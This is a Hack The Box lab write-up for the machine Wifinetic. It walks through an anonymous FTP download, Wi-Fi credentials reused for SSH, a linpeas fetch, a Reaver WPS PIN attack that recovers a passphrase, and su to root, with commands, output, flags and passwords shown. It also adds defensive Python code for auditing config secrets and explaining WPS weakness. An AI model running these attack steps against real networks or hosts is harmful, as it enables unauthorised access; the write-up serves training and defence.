
Wifinetic
Hack The Box Machine Writeup

Now that really looks like cloud computing!
Summary
Wifinetic is a very simple easy box that went straight into retirement. I would recommend it as a good box for beginners to build confidence on. There are very few steps involved in the compromise and they are all pretty straightforward. To grab user.txt the attacker must find an FTP share with anonymous access enabled. It contains a tar backup archive within which one can find both a username and a password. Using these together over SSH results in a shell as the netadmin user and user.txt.
The privilege escalation was the hardest part of the box. It starts by noticing the strange things going on with the wireless network interfaces, such as an AP being created through a wpa_supplicant process and a monitor interface being present. Reaver, a WPS (Wi-Fi Protected Setup) PIN cracking application, can also be found through file capabilities. Putting 2 and 2 together, the attacker can then use Reaver with the monitor interface against the AP to crack the AP's WPS PIN and recover its passphrase. This can then be used to switch to the root user and complete the box.

Life is a series of hard choices
Video Link
Check out my video walkthrough
User
Abusing anonymous FTP
I began with the traditional nmap scan with -sC for running default scripts and -sV for version enumeration.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.247
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:17 EDT
Nmap scan report for 10.10.11.247
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.30
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds
This scan shows FTP is open to anonymous authentication and there are a couple of files that I can grab. I used the prompt command to silence the download prompt and mget * to grab all the files in the share.
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> prompt
Interactive mode off.
ftp> mget *
local: MigrateOpenWrt.txt remote: MigrateOpenWrt.txt
229 Entering Extended Passive Mode (|||42131|)
150 Opening BINARY mode data connection for MigrateOpenWrt.txt (4434 bytes).
100% |***************************************************************************************************| 4434 50.33 MiB/s 00:00 ETA
226 Transfer complete.
<...>
Looking through the files, the backup tar archive stands out. It can be extracted with tar -xf and contains an etc folder.
┌──(kali㉿kali)-[~/Desktop]
└─$ tar -xf backup-OpenWrt-2023-07-26.tar
┌──(kali㉿kali)-[~/Desktop]
└─$ ls -la etc
total 72
drwxr-xr-x 7 kali kali 4096 Sep 11 11:23 .
drwxr-xr-x 3 kali kali 4096 Sep 17 13:20 ..
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 config
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 dropbear
-rw-r--r-- 1 kali kali 227 Jul 26 06:08 group
-rw-r--r-- 1 kali kali 110 Apr 27 16:28 hosts
-rw-r--r-- 1 kali kali 183 Apr 27 16:28 inittab
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 luci-uploads
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 nftables.d
drwxr-xr-x 3 kali kali 4096 Sep 11 11:22 opkg
-rw-r--r-- 1 kali kali 420 Jul 26 06:09 passwd
-rw-r--r-- 1 kali kali 1046 Apr 27 16:28 profile
-rw-r--r-- 1 kali kali 132 Apr 27 16:28 rc.local
-rw-r--r-- 1 kali kali 9 Apr 27 16:28 shells
-rw-r--r-- 1 kali kali 475 Apr 27 16:28 shinit
-rw-r--r-- 1 kali kali 80 Apr 27 16:28 sysctl.conf
-rw-r--r-- 1 kali kali 745 Jul 24 15:15 uhttpd.crt
-rw-r--r-- 1 kali kali 121 Jul 24 15:15 uhttpd.key

Opening a tar archive be like
Looking through this backup reveals an /etc/passwd file from which I grabbed the only non-default username, netadmin. I then used a find command that executes grep on every file to search for useful information.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ find . -type f -exec grep -i 'pass' {} \; -print
option password '$p$root'
./config/rpcd
option passwd '/etc/passwd'
./config/luci
option key 'VeRyUniUqWiFIPasswrd1!'
option key 'VeRyUniUqWiFIPasswrd1!'
./config/wireless
option PasswordAuth 'on'
option RootPasswordAuth 'on'
./config/dropbear
export HOME=$(grep -e "^${USER:-root}:" /etc/passwd | cut -d ":" -f 6)
There is no root password defined on this device!
Use the "passwd" command to set up a new password
./profile
Here I used the string 'pass' to search for passwords; the -print flag prints the name of the file each match came from below it. This search reveals a password for what appears to be a Wi-Fi network in the ./config/wireless file. Strangely enough, this password is only found by the find command because the value itself happens to contain the string 'pass'. Looking at the file, I noticed that it was the 'key' value for two wireless interfaces, so 'key' is a good example of another string to search for when quickly parsing a large number of files. Since I already had a username (netadmin) and port 22 was open, I tried these creds together and ended up with a foothold shell. From there I grabbed the user.txt file.
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ cat ./config/wireless
<...>
config wifi-iface 'wifinet0'
<...>
option key 'VeRyUniUqWiFIPasswrd1!'
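The find/grep search above only hit the key because the value happened to contain "pass". A more reliable way to audit a backup like this one before it lands on an anonymous share is to parse the UCI config files properly and flag every option whose name carries a secret, regardless of what the value looks like. The script below is an added example, not part of the original writeup and not OpenWrt's own tooling; the sample config text is constructed for the example (the PSK in it is a placeholder, not the box's password), and audit_backup_dir is a hypothetical helper that runs the same check over an extracted etc/config directory.

```python
import os
import shlex

# Option names that commonly carry secrets in OpenWrt/UCI configs.
# 'key' is included deliberately: a grep for 'pass' would never match it.
SECRET_OPTIONS = {"key", "password", "passwd", "secret", "psk", "wpa_psk", "wpa_passphrase"}

# Constructed sample in the shape of etc/config/wireless from the backup.
SAMPLE_WIRELESS = """\
config wifi-device 'radio0'
	option type 'mac80211'
	option channel '1'

config wifi-iface 'wifinet0'
	option device 'radio0'
	option mode 'ap'
	option ssid 'OpenWrt'
	option encryption 'psk2'
	option key 'EXAMPLE-psk-not-a-real-one'
	option wps_pushbutton '1'

config wifi-iface 'wifinet1'
	option device 'radio1'
	option mode 'sta'
	option ssid 'OpenWrt'
	option encryption 'psk2'
	option key 'EXAMPLE-psk-not-a-real-one'
"""


def parse_uci(text):
    """Parse UCI text into a list of (section_type, section_name, {option: value}).

    UCI sections start with `config <type> ['name']`; `option <name> '<value>'`
    lines belong to the most recent section. shlex handles the quoting, so a
    value such as '$p$root' is kept literally.
    """
    sections = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        if parts[0] == "config":
            name = parts[2] if len(parts) > 2 else None
            current = (parts[1], name, {})
            sections.append(current)
        elif parts[0] == "option" and current is not None:
            current[2][parts[1]] = parts[2] if len(parts) > 2 else ""
    return sections


def find_secrets(sections, filename):
    """Return every option whose *name* marks it as a secret, with its location."""
    findings = []
    for stype, sname, opts in sections:
        for opt, val in opts.items():
            if opt.lower() in SECRET_OPTIONS and val:
                findings.append({"file": filename, "section": f"{stype} {sname}",
                                 "option": opt, "value": val})
    return findings


def reuse_report(findings):
    """Group findings by value so a secret reused in several places shows up once,
    with every location listed (reuse is what turned this backup into a foothold)."""
    by_value = {}
    for f in findings:
        by_value.setdefault(f["value"], []).append(f"{f['file']}:{f['section']}.{f['option']}")
    return by_value


def audit_backup_dir(config_dir):
    """Hypothetical helper: run the same audit over every file in an extracted etc/config."""
    findings = []
    for name in sorted(os.listdir(config_dir)):
        path = os.path.join(config_dir, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(find_secrets(parse_uci(fh.read()), f"config/{name}"))
    return reuse_report(findings)


if __name__ == "__main__":
    for value, places in reuse_report(find_secrets(parse_uci(SAMPLE_WIRELESS), "config/wireless")).items():
        print(f"{value!r} used in {len(places)} place(s): {', '.join(places)}")
```

Pointing audit_backup_dir at the extracted etc/config from the tar would list every stored credential by file, section and option, and the grouping by value makes a passphrase shared between interfaces (or, as on this box, with a system account) immediately visible.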
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ ssh netadmin@10.10.11.247
netadmin@10.10.11.247's password:
VeRyUniUqWiFIPasswrd1!
<...>
netadmin@wifinetic:~$ cat user.txt
514c38a7c9d32457af05945ad5120351
I still think it should be pronounced dog-e
Root
Recon with Linpeas
I started with my normal enumeration routine of sudo -l and a search for SUID binaries for easy wins; neither revealed anything of value here. I then moved on to automated enumeration by transferring and running linpeas, using a simple Python HTTP server and curl in this instance.
netadmin@wifinetic:/tmp$ curl http://10.10.14.30/linpeas.sh > linpeash.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 816k 100 816k 0 0 2865k 0 --:--:-- --:--:-- --:--:-- 2865k
┌──(kali㉿kali)-[~/tools]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.247 - - [17/Sep/2023 13:30:40] "GET /linpeas.sh HTTP/1.1" 200 -
netadmin@wifinetic:/tmp$ chmod +x linpeash.sh
Running linpeas shows a couple of things that stand out. First, there are some strange things going on with the network: the host is running both a wireless AP interface and a wireless monitor interface called mon0. Monitor interfaces are commonly used to capture wireless handshakes that can then be brute-forced offline to recover the wireless network password. There is also a process running as root that calls wpa_supplicant, which is used here to create a wireless access point on Linux. This process is running the AP on interface wlan1.
netadmin@wifinetic:/tmp$ ./linpeash.sh
<...>
╔══════════╣ Cleaned processes
root 216269 0.0 0.2 13936 9128 ? Ss 17:30 0:00 /sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant.conf -i wlan1
╔══════════╣ Interfaces
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
wlan1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
Using Reaver to crack WPS password
Noticing this and looking at the capabilities section from linpeas, Reaver stands out. Reaver is a program used for cracking WPS PINs (and through them the WPA passphrase) that ships by default on penetration-testing distributions such as Kali Linux. Since there was a wireless AP running on interface wlan1 and a monitor interface already set up, I figured the route may be to crack the wireless AP password using Reaver. I ran iwconfig to display the wireless interface information again. From this I took the BSSID (the Access Point MAC address) of wlan1, 02:00:00:00:00:00, as Reaver's -b parameter and the name of the monitor interface, mon0, as its -i parameter.
╔══════════╣ Capabilities
<...>
/usr/bin/reaver = cap_net_raw+ep
netadmin@wifinetic:/tmp$ iwconfig
<...>
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:1 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:2 Missed beacon:0
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
netadmin@wifinetic:/tmp$ reaver -i mon0 -b 02:00:00:00:00:00
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
The speed with which Reaver cracks the WPS PIN is evidence of why WPS is deprecated and no longer considered safe. Since the process running the wireless AP (wpa_supplicant) runs as root, as discovered previously, I assumed this wireless AP password may have been reused. Using the su - command with the password (WhatIsRealAnDWhAtIsNot51121!) works to switch to a root shell, and from here the box is completed. I grabbed root.txt and dropped the mic.
netadmin@wifinetic:/tmp$ su -
Password: WhatIsRealAnDWhAtIsNot51121!
root@wifinetic:~# cat root.txt
5a48a4dbd007aa60ff391c0897ce695f
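The reason Reaver recovers the PIN quickly is structural, not a weakness of this particular box: the eighth digit of a WPS PIN is a checksum over the first seven, and the WPS registrar acknowledges the first four digits and the last three separately, so the effective keyspace collapses from 10^7 to 10^4 + 10^3 = 11,000 candidates. The block below is an added example, not part of the original writeup or of Reaver, that implements the published PIN checksum (the one that makes 12345670 a valid PIN) and works the keyspace arithmetic through, which is what the deprecation of WPS rests on.

```python
# Weights applied to the seven PIN body digits, most significant first,
# as defined in the Wi-Fi Protected Setup specification.
WPS_WEIGHTS = (3, 1, 3, 1, 3, 1, 3)


def wps_pin_checksum(first7):
    """Return the checksum digit for a 7-digit WPS PIN body."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("PIN body must be exactly seven digits")
    accum = sum(int(d) * w for d, w in zip(first7, WPS_WEIGHTS))
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin):
    """True when an 8-digit PIN's last digit matches the checksum of its first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_pin_checksum(pin[:7]) == int(pin[7])


def keyspace():
    """Worst-case guesses for an online PIN attack, naive vs. the protocol's real behaviour.

    naive: seven free digits plus a derivable checksum -> 10^7 PINs.
    split: the registrar confirms the first half (4 digits) and the second
           half (3 free digits + checksum) independently -> 10^4 + 10^3.
    """
    naive = 10 ** 7
    split = 10 ** 4 + 10 ** 3
    return naive, split


def reduction_factor():
    """How many times smaller the real keyspace is than the naive one."""
    naive, split = keyspace()
    return naive / split


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    naive, split = keyspace()
    print(f"naive {naive:,} guesses vs split-PIN {split:,} ({reduction_factor():.0f}x fewer)")
```

Only the PIN itself and the arithmetic are shown here; the takeaway for an administrator is that an AP with WPS PIN registration enabled has at most 11,000 distinct responses to exhaust, so the fix is to disable WPS (on OpenWrt, remove wps_pushbutton/WPS options from the wifi-iface) and never share the Wi-Fi passphrase with any system account, which is what turned the PSK into a root shell on this box.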
Thank you for reading, until next time!
Other resources
0xdf writeup
0xdf.gitlab.io
Ippsec video walkthrough